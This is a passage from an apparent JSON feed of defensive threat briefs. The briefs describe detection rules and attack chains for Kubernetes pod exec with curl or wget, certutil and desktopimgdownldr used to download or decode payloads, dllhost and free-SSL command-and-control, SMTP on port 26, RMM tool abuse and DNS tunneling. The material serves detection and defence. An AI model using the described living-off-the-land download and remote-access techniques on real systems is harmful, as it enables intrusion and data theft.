environment.\u003c/li\u003e\n\u003cli\u003eReview Kubernetes RoleBindings for \u003ccode\u003epods/exec\u003c/code\u003e to ensure only required principals retain access on sensitive namespaces.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule by reviewing the decoded URI and reconstructed command in the alert details.\u003c/li\u003e\n\u003cli\u003eImplement network policies to restrict egress traffic from pods, limiting the potential for data exfiltration via HTTPS.\u003c/li\u003e\n\u003cli\u003eRegularly audit Kubernetes audit logs for suspicious activity related to pod execution and API calls.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T14:27:00Z","date_published":"2024-01-03T14:27:00Z","id":"/briefs/2024-01-kubernetes-pod-exec/","summary":"This rule detects Kubernetes pod exec API calls using curl or wget to fetch HTTPS URLs, potentially indicating malicious activity such as staging tools or exfiltrating data.","title":"Kubernetes Pod Exec with Curl or Wget to HTTPS","url":"https://feed.craftedsignal.io/briefs/2024-01-kubernetes-pod-exec/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend","SentinelOne Cloud Funnel","Windows"],"_cs_severities":["medium"],"_cs_tags":["defense-evasion","command-and-control","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic","SentinelOne"],"content_html":"\u003cp\u003eThe detection rule identifies unusual instances of dllhost.exe making outbound network connections, which may indicate adversarial command and control activity. Dllhost.exe is a legitimate Windows process used to host DLL services. Adversaries may exploit it for stealthy command and control by initiating unauthorized network connections to non-local IPs. This approach helps in identifying potential threats by focusing on unusual network behaviors associated with this process. The rule aims to detect activity related to defense evasion, where adversaries use system binaries to proxy execution. The detection logic relies on identifying dllhost.exe processes initiating network connections to destinations outside of commonly used private IP ranges.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a Windows system (e.g., via phishing or exploitation).\u003c/li\u003e\n\u003cli\u003eThe attacker executes a malicious DLL file on the compromised system.\u003c/li\u003e\n\u003cli\u003eThe attacker uses dllhost.exe to host and execute the malicious DLL.\u003c/li\u003e\n\u003cli\u003eThe malicious DLL initiates a network connection to an external IP address, bypassing traditional process-based network monitoring.\u003c/li\u003e\n\u003cli\u003eThe attacker establishes a command and control (C2) channel via the dllhost.exe process.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the C2 channel to send commands and receive data from the compromised system.\u003c/li\u003e\n\u003cli\u003eThe attacker performs lateral movement within the network.\u003c/li\u003e\n\u003cli\u003eThe attacker exfiltrates sensitive data from the compromised network.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful attack can lead to the establishment of a covert command and control channel, allowing attackers to remotely control the compromised system. This can result in data theft, further compromise of the network, and potential financial loss. The references point to APT29 activity, suggesting sophisticated actors may leverage this technique.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable Sysmon process creation (Event ID 1) and network connection (Event ID 3) logging to enhance visibility of process execution and network activity (\u003ca href=\"https://ela.st/sysmon-event-1-setup\"\u003ehttps://ela.st/sysmon-event-1-setup\u003c/a\u003e, \u003ca href=\"https://ela.st/sysmon-event-3-setup\"\u003ehttps://ela.st/sysmon-event-3-setup\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eUnusual Network Connection via DllHost\u003c/code\u003e to your SIEM to detect suspicious outbound connections from dllhost.exe.\u003c/li\u003e\n\u003cli\u003eInvestigate and whitelist legitimate software updates or enterprise applications that use dllhost.exe for network communications to reduce false positives, as described in the rule\u0026rsquo;s analysis notes.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T14:00:00Z","date_published":"2024-01-03T14:00:00Z","id":"/briefs/2024-01-unusual-dllhost-network-connection/","summary":"The rule identifies unusual instances of dllhost.exe making outbound network connections to non-local IPs, which may indicate adversarial Command and Control activity and defense evasion.","title":"Unusual Network Connection via DllHost","url":"https://feed.craftedsignal.io/briefs/2024-01-unusual-dllhost-network-connection/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Windows"],"_cs_severities":["medium"],"_cs_tags":["defense-evasion","command-and-control","credential-access","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eCertUtil is a command-line utility included with Windows, designed for managing digital certificates and certificate services. Attackers frequently abuse it to \u0026ldquo;live off the land\u0026rdquo; by downloading malware, deobfuscating files, and establishing command and control channels within compromised environments. This activity leverages certutil.exe to perform actions typically associated with malicious payloads, blending in with legitimate system activity and evading traditional security measures. The tool\u0026rsquo;s capability to encode, decode, and retrieve files from URLs makes it a versatile asset for attackers aiming to maintain a low profile while executing malicious operations. This detection focuses on identifying specific command-line arguments indicative of this abuse, such as those used for encoding, decoding, and URL retrieval.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker gains initial access through an undisclosed means (e.g., phishing, exploit).\u003c/li\u003e\n\u003cli\u003eThe attacker executes certutil.exe via cmd.exe or PowerShell.\u003c/li\u003e\n\u003cli\u003eCertutil is used with the \u003ccode\u003eurlcache\u003c/code\u003e parameter to download a malicious payload from a remote server.\u003c/li\u003e\n\u003cli\u003eCertutil uses the \u003ccode\u003edecode\u003c/code\u003e parameter to decode a base64-encoded payload, saving it to disk.\u003c/li\u003e\n\u003cli\u003eThe attacker uses certutil with \u003ccode\u003eencodehex\u003c/code\u003e to encode a binary into a hexadecimal representation to evade signature-based detection.\u003c/li\u003e\n\u003cli\u003eThe attacker then uses certutil with \u003ccode\u003edecodehex\u003c/code\u003e to decode the hexadecimal encoded data.\u003c/li\u003e\n\u003cli\u003eThe attacker executes the decoded payload, gaining further control of the system.\u003c/li\u003e\n\u003cli\u003eThe attacker establishes a command and control channel, using certutil to encode/decode communications.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows attackers to download and execute arbitrary code, bypass security measures, and maintain persistence within the compromised system. This can lead to data exfiltration, system compromise, and further propagation of the attack within the network. The lack of directly observed IOCs in the originating advisory limits quantification of victim count and impact scope, but the technique is widely applicable.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Suspicious CertUtil Usage for Encoding/Decoding\u0026rdquo; to detect abuse of encoding/decoding functions within certutil.exe, focusing on unusual file types or destinations.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Suspicious CertUtil URL Download\u0026rdquo; to identify certutil.exe being used to download files from URLs, and tune the rule based on known good software deployment practices.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process creation logging to ensure the rules above function correctly by capturing command-line arguments (as referenced in the logsource for each rule).\u003c/li\u003e\n\u003cli\u003eReview historical process execution logs for instances of certutil.exe using suspicious parameters like \u003ccode\u003edecode\u003c/code\u003e, \u003ccode\u003eencode\u003c/code\u003e, \u003ccode\u003eurlcache\u003c/code\u003e, \u003ccode\u003everifyctl\u003c/code\u003e, \u003ccode\u003eencodehex\u003c/code\u003e, \u003ccode\u003edecodehex\u003c/code\u003e, or \u003ccode\u003eexportPFX\u003c/code\u003e to identify potentially compromised systems.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T14:00:00Z","date_published":"2024-01-03T14:00:00Z","id":"/briefs/2024-01-suspicious-certutil/","summary":"Attackers abuse certutil.exe, a native Windows utility, to download/deobfuscate malware for command and control or data exfiltration, evading defenses.","title":"Suspicious CertUtil Commands Used for Defense Evasion","url":"https://feed.craftedsignal.io/briefs/2024-01-suspicious-certutil/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["MicrosoftEdge"],"_cs_severities":["low"],"_cs_tags":["command-and-control","encrypted-channel","freessl"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eThis detection rule identifies Windows processes communicating with domains using free SSL certificates from providers like Let\u0026rsquo;s Encrypt, SSLforFree, ZeroSSL, and FreeSSL. Attackers can leverage these certificates to encrypt command and control (C2) communications, blending malicious traffic with legitimate encrypted web traffic. The rule focuses on detecting unusual processes, specifically those originating from standard Windows system paths that would not typically establish connections to services using free SSL certificates. This excludes known benign processes to reduce false positives and highlight potentially malicious C2 activity. This rule was published on 2020/11/04 and last updated on 2026/05/04.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker compromises a Windows host.\u003c/li\u003e\n\u003cli\u003eThe attacker installs a malicious agent on the compromised host.\u003c/li\u003e\n\u003cli\u003eThe agent is configured to use a domain that utilizes a free SSL certificate for C2 communication.\u003c/li\u003e\n\u003cli\u003eThe malicious agent establishes a DNS connection to a domain ending in *.letsencrypt.org, *.sslforfree.com, *.zerossl.com, or *.freessl.org.\u003c/li\u003e\n\u003cli\u003eThe infected host bypasses host-based firewalls, as the traffic is encrypted.\u003c/li\u003e\n\u003cli\u003eThe agent receives commands from the C2 server over the encrypted channel.\u003c/li\u003e\n\u003cli\u003eThe attacker executes commands to perform lateral movement or data exfiltration.\u003c/li\u003e\n\u003cli\u003eThe attacker exfiltrates sensitive data from the compromised host.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation could lead to undetected command and control activity within the network. Attackers could use this encrypted channel to exfiltrate sensitive data, deploy ransomware, or move laterally to other systems. Due to the use of free SSL certificates, the traffic appears legitimate and can bypass basic network security controls. While the rule severity is low, a successful C2 channel can lead to critical impact.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the provided Sigma rule to your SIEM to detect potentially malicious processes using free SSL certificates for communication, tuning the false positives for your environment.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule, focusing on processes not typically associated with network activity originating from the defined Windows system paths.\u003c/li\u003e\n\u003cli\u003eMonitor DNS query logs for connections to domains using free SSL certificates from unusual or untrusted processes.\u003c/li\u003e\n\u003cli\u003eUpdate the Sigma rule with new free SSL certificate providers and adjust the excluded processes based on observed false positives in your environment.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon Event ID 22 (DNS Query) logging for better visibility into DNS requests.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-freesslcert-c2/","summary":"This rule identifies unusual Windows processes connecting to domains using known free SSL certificates such as Let's Encrypt, which adversaries may use to conceal command and control traffic.","title":"Unusual Windows Processes Connecting to Domains Using Free SSL Certificates","url":"https://feed.craftedsignal.io/briefs/2024-01-freesslcert-c2/"},{"_cs_actors":["BadPatch"],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["low"],"_cs_tags":["command-and-control","exfiltration","network-traffic"],"_cs_type":"threat","_cs_vendors":[],"content_html":"\u003cp\u003eThis detection rule identifies suspicious SMTP activity occurring over TCP port 26. While standard SMTP traffic typically uses port 25, port 26 is sometimes used as an alternative to avoid conflicts or restrictions. The BadPatch malware family has been known to leverage port 26 for command and control (C2) communications with compromised Windows systems. This activity is considered suspicious because legitimate uses of SMTP on port 26 are less common and can indicate malicious activity, such as covert C2 channels used by malware like BadPatch. The rule analyzes network traffic to detect SMTP communication occurring on this non-standard port, helping to identify potential infections or unauthorized network activity.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eInitial infection occurs via an unspecified method (e.g., phishing, exploit).\u003c/li\u003e\n\u003cli\u003eMalware establishes a foothold on the compromised system.\u003c/li\u003e\n\u003cli\u003eMalware configures itself to use SMTP on port 26 for C2 communications.\u003c/li\u003e\n\u003cli\u003eThe infected host initiates a TCP connection to a remote server on port 26.\u003c/li\u003e\n\u003cli\u003eThe malware sends commands to the infected host over the SMTP connection on port 26.\u003c/li\u003e\n\u003cli\u003eThe infected host executes the received commands.\u003c/li\u003e\n\u003cli\u003eThe malware may exfiltrate data to the remote server over the SMTP connection on port 26.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eCompromised systems may be remotely controlled by attackers, leading to data theft, malware propagation, or further malicious activities. The use of non-standard ports like 26 can help attackers evade detection. If successful, an attacker can maintain persistence and control over the compromised system.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect SMTP Traffic on TCP Port 26\u003c/code\u003e to your SIEM and tune for your environment to detect potential command and control activity.\u003c/li\u003e\n\u003cli\u003eInvestigate any network connections on TCP port 26 to identify potentially malicious SMTP traffic.\u003c/li\u003e\n\u003cli\u003eReview network traffic logs focusing on \u003ccode\u003enetwork_traffic.flow\u003c/code\u003e or \u003ccode\u003ezeek.smtp\u003c/code\u003e events to detect unusual patterns associated with TCP port 26.\u003c/li\u003e\n\u003cli\u003eImplement firewall rules to block unauthorized SMTP traffic on port 26.\u003c/li\u003e\n\u003cli\u003eExamine source and destination IP addresses of traffic on port 26, and correlate with threat intelligence sources to identify known malicious actors as per the references.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-03-smtp-port-26/","summary":"This rule detects SMTP traffic on TCP port 26, an alternative to the standard port 25 that the BadPatch malware family has used for command and control of Windows systems.","title":"Suspicious SMTP Activity on Port 26/TCP","url":"https://feed.craftedsignal.io/briefs/2024-01-03-smtp-port-26/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Endpoint","Sysmon"],"_cs_severities":["medium"],"_cs_tags":["command-and-control","remote-access","windows"],"_cs_type":"advisory","_cs_vendors":["TeamViewer","LogMeIn","AnyDesk","ScreenConnect","ConnectWise","Splashtop","Zoho","RustDesk","n-able","Kaseya","BeyondTrust","Tailscale","JumpCloud","VNC","Datto","Auvik","SyncroMSP","Pulseway","NinjaOne","Liongard","Naverisk","Panorama9","Tactical RMM","MeshCentral","ISL Online","Goverlan","Iperius","Remotix","Mikogo","Action1","Elastic"],"content_html":"\u003cp\u003eThis detection identifies DNS queries to commonly abused remote monitoring and management (RMM) or remote access software domains originating from processes that are not web browsers. This activity can indicate the use of legitimate RMM tools for malicious purposes, such as command and control, persistence, or lateral movement within a network. The detection aims to surface RMM clients, scripts, or other non-browser activities contacting these services without legitimate user interaction. Defenders should investigate processes making these queries to confirm expected behavior and validate the security posture of their managed assets. The rule is based on a list of known RMM domains and excludes common browser processes to reduce false positives.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a Windows host through unspecified means.\u003c/li\u003e\n\u003cli\u003eThe attacker deploys or leverages an existing RMM tool on the compromised host.\u003c/li\u003e\n\u003cli\u003eThe RMM tool, running as a non-browser process, initiates a DNS query to resolve a command and control server associated with the RMM service (e.g., teamviewer.com).\u003c/li\u003e\n\u003cli\u003eThe DNS query is made by a process other than a known web browser (chrome.exe, firefox.exe, etc.).\u003c/li\u003e\n\u003cli\u003eThe compromised host establishes a connection to the resolved IP address associated with the RMM domain.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the RMM tool to execute commands, transfer files, or perform other malicious activities on the compromised host.\u003c/li\u003e\n\u003cli\u003eThe attacker may use the RMM tool for lateral movement, pivoting to other systems within the network.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their objective, which could include data exfiltration, ransomware deployment, or maintaining persistent access.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eCompromise via abused RMM software can lead to full system compromise, data theft, or deployment of ransomware. While the number of affected victims is unknown, the sectors most likely to be impacted include any organization that relies on RMM tools for IT management. Successful exploitation allows attackers to bypass traditional security controls by using legitimate software, making detection more challenging.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;DNS Queries to Known RMM Domains from Non-Browser Processes\u0026rdquo; to your SIEM and tune the RMM domain list for your environment.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule, focusing on identifying the process responsible for the DNS query and its parent process.\u003c/li\u003e\n\u003cli\u003eImplement application control policies to restrict the execution of unauthorized RMM tools.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon DNS event logging to ensure the necessary data is available for the detection rule.\u003c/li\u003e\n\u003cli\u003eCorrelate with other alerts to identify potential compromises.\u003c/li\u003e\n\u003cli\u003eReview process.code_signature for trusted RMM publishers and investigate any unsigned or unexpected signers.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-rmm-dns-non-browser/","summary":"Detection of DNS queries to remote monitoring and management (RMM) domains from non-browser processes indicating potential misuse of legitimate remote access tools for command and control.","title":"Suspicious DNS Queries to RMM Domains from Non-Browser Processes","url":"https://feed.craftedsignal.io/briefs/2024-01-rmm-dns-non-browser/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend","Sysmon","Chrome","Edge","Firefox","Safari","Brave Browser","Opera Browser","Vivaldi Browser","WebView2"],"_cs_severities":["medium"],"_cs_tags":["command-and-control","rmm","dns"],"_cs_type":"advisory","_cs_vendors":["Elastic","Microsoft","Mozilla","Apple","Brave","Opera","Vivaldi"],"content_html":"\u003cp\u003eThis detection identifies potentially malicious use of Remote Monitoring and Management (RMM) tools by detecting DNS queries to known RMM domains originating from processes that are not web browsers. Attackers frequently abuse legitimate RMM software for command and control, persistence, and lateral movement within compromised networks. This rule focuses on surfacing RMM clients, scripts, or other non-browser activity contacting these services, thereby increasing the likelihood of detecting unauthorized remote access or malicious activity. The rule aims to reduce false positives by excluding common browser processes and focusing on unusual network activity. The identified domains are associated with various RMM tools like TeamViewer, AnyDesk, and ScreenConnect. This detection is relevant for organizations concerned about insider threats, supply chain attacks, or general compromise leading to unauthorized remote access.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a system, possibly through phishing or exploiting a vulnerability.\u003c/li\u003e\n\u003cli\u003eThe attacker installs an unauthorized RMM tool (e.g., using a script or installer).\u003c/li\u003e\n\u003cli\u003eThe RMM tool initiates a DNS query to resolve its command and control domain (e.g., teamviewer.com).\u003c/li\u003e\n\u003cli\u003eThe system, now running the RMM agent, establishes a connection to the attacker-controlled RMM server.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the RMM tool to execute commands on the compromised system.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the RMM tool for lateral movement within the network.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the RMM tool to maintain persistence on the compromised system.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eCompromise via unauthorized RMM tools can provide attackers with persistent remote access, enabling them to perform a range of malicious activities, including data theft, ransomware deployment, and further lateral movement within the network. Successful exploitation can lead to significant financial loss, reputational damage, and disruption of business operations. The number of affected systems can vary depending on the scope of the initial compromise and the attacker\u0026rsquo;s ability to move laterally.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eRMM Domain DNS Queries from Non-Browser Processes\u003c/code\u003e to your SIEM and tune it to your environment, excluding legitimate non-browser processes that use RMM tools.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the rule, focusing on identifying the process making the DNS query and its parent process, as outlined in the rule\u0026rsquo;s description.\u003c/li\u003e\n\u003cli\u003eMonitor DNS query logs for queries to the RMM domains listed in the IOC table, and block them at the DNS resolver if unauthorized RMM use is confirmed.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon Event ID 22 (DNS Query) logging to provide the necessary data for this detection, as recommended in the \u0026ldquo;Setup\u0026rdquo; section of the content.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-rmm-domain-dns/","summary":"Detects DNS queries to commonly abused remote monitoring and management (RMM) or remote access software domains from non-browser processes, potentially indicating unauthorized remote access or command and control activity.","title":"RMM Domain DNS Queries from Non-Browser Processes","url":"https://feed.craftedsignal.io/briefs/2024-01-rmm-domain-dns/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Microsoft Defender XDR"],"_cs_severities":["medium"],"_cs_tags":["command and control","rmm","msi","windows","remote access"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eThis detection identifies a suspicious sequence of events where an MSI installer is executed, followed by the launch of remote management software (RMM) such as ScreenConnect, Syncro, or VNC. Attackers may leverage this technique to gain unauthorized access to systems by first installing malicious software via an MSI package, and then using the RMM software to establish a remote connection. The rule specifically looks for msiexec.exe being run with an install argument (/i) followed by the execution of known RMM tools within a short timeframe. This behavior is often indicative of malicious actors attempting to establish persistent remote access to compromised machines. The detection is designed for Windows environments and covers a range of data sources including Elastic Defend, Sysmon, SentinelOne, Microsoft Defender XDR, and Crowdstrike.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a system through various means (e.g., social engineering, compromised website, or existing malware).\u003c/li\u003e\n\u003cli\u003eThe attacker deploys a malicious MSI installer to the victim machine. This can be done through phishing attachments or drive-by downloads.\u003c/li\u003e\n\u003cli\u003eThe user executes the MSI installer (msiexec.exe) with an installation argument (/i or -i). The parent process is typically explorer.exe or sihost.exe, indicating user-initiated installation.\u003c/li\u003e\n\u003cli\u003eThe MSI installer executes, potentially installing malware or modifying system settings.\u003c/li\u003e\n\u003cli\u003eWithin one minute of the MSI installation, a remote management software (RMM) client is launched, such as ScreenConnect.ClientService.exe, Syncro.Installer.exe, tvnserver.exe, or winvnc.exe.\u003c/li\u003e\n\u003cli\u003eThe RMM client attempts to establish an outbound connection to a remote server controlled by the attacker, often using pre-configured access keys.\u003c/li\u003e\n\u003cli\u003eThe attacker gains remote access to the compromised system via the RMM client. In the case of ScreenConnect, the attacker may use a guest link with a known session key.\u003c/li\u003e\n\u003cli\u003eThe attacker performs malicious activities, such as data exfiltration, lateral movement, or installing additional malware.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows attackers to gain persistent remote access to compromised systems. This can lead to data theft, financial fraud, or disruption of services. Depending on the scope of the initial access, the attacker may be able to move laterally within the network, compromising additional systems. The use of RMM software can mask malicious activity as legitimate remote support, making detection more difficult.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable process creation logging via Sysmon or Windows Security Event Logs to capture the execution of msiexec.exe and RMM tools.\u003c/li\u003e\n\u003cli\u003eDeploy the \u0026ldquo;Remote Management Access Launch After MSI Install\u0026rdquo; Sigma rule to your SIEM and tune the timeframe (maxspan) to suit your environment.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by this rule, focusing on the source of the MSI file and the destination of the RMM connection.\u003c/li\u003e\n\u003cli\u003eBlock the execution of unauthorized RMM software on your network based on process name, as identified in the rule (ScreenConnect.ClientService.exe, Syncro.Installer.exe, tvnserver.exe, winvnc.exe).\u003c/li\u003e\n\u003cli\u003eMonitor network connections for RMM software connecting to unusual or external IPs.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-rmm-after-msi/","summary":"Detects an MSI installer execution followed by the execution of commonly abused Remote Management Software like ScreenConnect, potentially indicating abuse where an attacker triggers an MSI install then connects via a guest link with a known session key.","title":"Remote Management Access Launch After MSI Install","url":"https://feed.craftedsignal.io/briefs/2024-01-rmm-after-msi/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Microsoft Defender XDR","Elastic Defend"],"_cs_severities":["medium"],"_cs_tags":["command-and-control","file-download","windows","desktopimgdownldr"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic","Crowdstrike","SentinelOne"],"content_html":"\u003cp\u003eThe \u003ccode\u003edesktopimgdownldr.exe\u003c/code\u003e utility, a legitimate Windows tool for configuring lock screen and desktop images, can be misused by adversaries to download arbitrary files from remote locations. This is achieved by leveraging the \u003ccode\u003e/lockscreenurl\u003c/code\u003e argument followed by an HTTP or HTTPS URL. This technique allows attackers to bypass traditional download restrictions and can be used to retrieve malicious payloads, tools, or scripts directly onto a compromised system. This method is particularly effective because \u003ccode\u003edesktopimgdownldr.exe\u003c/code\u003e is a signed Microsoft binary, potentially evading initial detection based on process name or file reputation. The detection rule was initially created in September 2020 and updated in May 2026. This technique is valuable for attackers seeking to transfer files without using common tools like \u003ccode\u003ecertutil\u003c/code\u003e, \u003ccode\u003epowershell\u003c/code\u003e, or \u003ccode\u003ebitsadmin\u003c/code\u003e.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker gains initial access to the target system through an existing vulnerability, credential compromise, or social engineering.\u003c/li\u003e\n\u003cli\u003eThe attacker executes \u003ccode\u003edesktopimgdownldr.exe\u003c/code\u003e with the \u003ccode\u003e/lockscreenurl\u003c/code\u003e argument, specifying a URL from which to download a malicious file.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edesktopimgdownldr.exe\u003c/code\u003e initiates an HTTP or HTTPS request to the specified URL.\u003c/li\u003e\n\u003cli\u003eThe remote server responds with the file content, which \u003ccode\u003edesktopimgdownldr.exe\u003c/code\u003e saves to disk.\u003c/li\u003e\n\u003cli\u003eThe attacker then executes the downloaded file (e.g., a malicious script or executable).\u003c/li\u003e\n\u003cli\u003eThe malicious code performs actions such as establishing persistence, escalating privileges, or deploying further malware.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the compromised system to move laterally within the network, accessing sensitive data and systems.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their final objective, such as data exfiltration, ransomware deployment, or disruption of services.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows attackers to download and execute arbitrary files on a Windows system, leading to potential compromise of the host and the network. This can result in data theft, system damage, or ransomware infection. Due to the legitimate nature of the \u003ccode\u003edesktopimgdownldr.exe\u003c/code\u003e utility, this technique can bypass security controls and detection mechanisms, increasing the likelihood of successful exploitation. While the exact number of victims is unknown, any Windows system where an attacker can execute commands is potentially vulnerable.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Remote File Download via Desktopimgdownldr Utility\u0026rdquo; to your SIEM to detect the execution of \u003ccode\u003edesktopimgdownldr.exe\u003c/code\u003e with the \u003ccode\u003e/lockscreenurl\u003c/code\u003e argument.\u003c/li\u003e\n\u003cli\u003eMonitor process creation events for \u003ccode\u003edesktopimgdownldr.exe\u003c/code\u003e to identify suspicious command-line arguments.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process creation logging to ensure sufficient data is available for the provided Sigma rules.\u003c/li\u003e\n\u003cli\u003eInvestigate any instances of \u003ccode\u003edesktopimgdownldr.exe\u003c/code\u003e downloading files from external URLs to determine if they are malicious.\u003c/li\u003e\n\u003cli\u003eImplement application control policies to restrict the execution of unauthorized or unknown executables in sensitive environments.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-desktopimgdownldr-remote-file-copy/","summary":"The desktopimgdownldr utility can be abused to download remote files, potentially bypassing standard download restrictions and acting as an alternative to certutil for malware or tool deployment.","title":"Remote File Download via Desktopimgdownldr Utility","url":"https://feed.craftedsignal.io/briefs/2024-01-desktopimgdownldr-remote-file-copy/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["M365 Defender","Elastic Defend","SentinelOne Cloud Funnel"],"_cs_severities":["medium"],"_cs_tags":["dns-tunneling","command-and-control","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic","SentinelOne"],"content_html":"\u003cp\u003eAttackers can abuse DNS protocol for command and control and/or data exfiltration by exploiting network rules that allow DNS communication with external resources. This technique, known as DNS tunneling, involves encoding data within DNS queries to transmit commands, malicious files, or exfiltrate sensitive information to attacker-controlled DNS servers. Detection focuses on identifying anomalous patterns of nslookup.exe usage, specifically a high volume of executions with explicit query types originating from a single host within a short timeframe. This activity may 